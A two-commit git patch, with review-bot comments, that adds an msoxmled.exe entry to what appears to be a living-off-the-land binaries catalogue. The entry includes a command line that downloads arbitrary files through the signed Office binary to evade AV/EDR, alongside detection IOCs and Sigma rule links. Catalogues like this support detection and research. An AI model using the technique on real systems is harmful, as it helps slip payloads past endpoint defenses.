From ed3cd2b46919c58eb96bf5fa4050bb4c6a3d933b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Bo=C4=9Fa=C3=A7=20KAYA?= Date: Fri, 22 Aug 2025 18:56:43 +0300 Subject: [PATCH 1/2] Add msoxmled.exe as a LOLBin for file download and AV/EDR bypass --- yml/OSBinaries/Msoxmled.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 yml/OSBinaries/Msoxmled.yml diff --git a/yml/OSBinaries/Msoxmled.yml b/yml/OSBinaries/Msoxmled.yml new file mode 100644 index 00000000..6171f80a --- /dev/null +++ b/yml/OSBinaries/Msoxmled.yml 
@@ -0,0 +1,33 @@ +Name: msoxmled.exe +Description: Microsoft Office XML Editor, used to handle XML documents in Microsoft Office. +Author: Boğaç Kaya +Created: 2025-08-22 +Commands: + - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe + Description: Downloads a file from a specified URL using msoxmled.exe. + Usecase: Download arbitrary files from the internet, bypassing AV/EDR due to the legitimate nature of the binary. + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe + Description: Downloads a file from a specified URL using msoxmled.exe, evading defenses by using a signed Microsoft binary. + Usecase: Download arbitrary files while evading AV/EDR detection through legitimate signed binary proxy execution. + Category: AWL Bypass + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 +Full_Path: + - Path: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoxmled.exe + - Path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\msoxmled.exe +Detection: + - IOC: msoxmled.exe making network connections to external URLs + - IOC: Unexpected file downloads initiated by msoxmled.exe + - IOC: Event ID 1 with Image: msoxmled.exe and CommandLine: msoxmled.exe /verb open + - IOC: Event ID 11 with Image: msoxmled.exe + - Sigma: https://github.com/frknclk34/SigmaRule/blob/main/Download%20Arbitrary%20Files%20Via%20Msoxmled.EXE +Resources: + - Link: https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013 +Acknowledgement: + - Person: Furkan CELİK + Handle: '@frknclk34' \ No newline at end of file From 73f14524acce7016f6b75ad34ddaad4d8c9fd55e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Bo=C4=9Fa=C3=A7=20KAYA?= Date: Wed, 27 Aug 2025 17:12:13 +0300 Subject: [PATCH 2/2] Add msoxmled.exe as a LOLBin for file download and AV/EDR bypass --- yml/OSBinaries/Msoxmled.yml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/yml/OSBinaries/Msoxmled.yml b/yml/OSBinaries/Msoxmled.yml index 6171f80a..f480884e 100644 --- a/yml/OSBinaries/Msoxmled.yml +++ b/yml/OSBinaries/Msoxmled.yml @@ -1,6 +1,7 @@ + --- Name: msoxmled.exe Description: Microsoft Office XML Editor, used to handle XML documents in Microsoft Office. -Author: Boğaç Kaya +Author: Bogac Kaya Created: 2025-08-22 Commands: - Command: .\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe @@ -25,9 +26,11 @@ Detection: - IOC: Unexpected file downloads initiated by msoxmled.exe - IOC: Event ID 1 with Image: msoxmled.exe and CommandLine: msoxmled.exe /verb open - IOC: Event ID 11 with Image: msoxmled.exe - - Sigma: https://github.com/frknclk34/SigmaRule/blob/main/Download%20Arbitrary%20Files%20Via%20Msoxmled.EXE + - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_msoxmled_download.yml Resources: - Link: https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013 Acknowledgement: - - Person: Furkan CELİK - Handle: '@frknclk34' \ No newline at end of file + - Person: Bogac Kaya + Handle: 'bogackayaa' + - Person: Furkan Celik + Handle: '@fkrnclk34'
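Review bot: the second `Commands` entry in the new-file hunk repeats the first entry's command verbatim (`.\msoxmled.exe /verb open https://live.sysinternals.com/Sysmon64.exe`) but files it under `Category: AWL Bypass` with `MitreID: T1218`; nothing in the hunk shows the fetched file being executed or an allow list being bypassed, so either drop the duplicate or replace it with a command that actually demonstrates the proxy-execution behaviour. The `Description` says a file is downloaded but not where it is written; stating the on-disk location would make the `Event ID 11 with Image: msoxmled.exe` IOC actionable, and both `Event ID 1` and `Event ID 11` should name their log source (Sysmon), since those numbers mean something else in other channels. The file also ends without a trailing newline (`\ No newline at end of file`).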
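Review bot: in the first hunk of PATCH 2/2 the added document marker renders as `+ ---`; check that the line is `---` at column 0, because a leading space turns it into a plain scalar instead of a YAML document start. Changing `Author: Boğaç Kaya` to `Author: Bogac Kaya` is fine, but the second commit reuses the subject of the first ("Add msoxmled.exe as a LOLBin for file download and AV/EDR bypass") and should instead describe what it fixes (document marker, Sigma link, acknowledgements) so the history explains why a second patch exists.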
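Review bot: in the second hunk of PATCH 2/2 the handle for Furkan Celik changes from `'@frknclk34'` to `'@fkrnclk34'`, transposing two letters; the GitHub URL removed in the same hunk (`https://github.com/frknclk34/SigmaRule/...`) used the original spelling, so the new value looks like a typo and should be checked against the account. The added `Handle: 'bogackayaa'` also lacks the `@` prefix used on the other handle; make the two consistent. The replacement `Sigma:` link points into `SigmaHQ/sigma` at `rules/windows/process_creation/proc_creation_win_msoxmled_download.yml`; confirm that the rule is merged upstream at that path before the entry relies on it, otherwise the Detection link is dead on arrival.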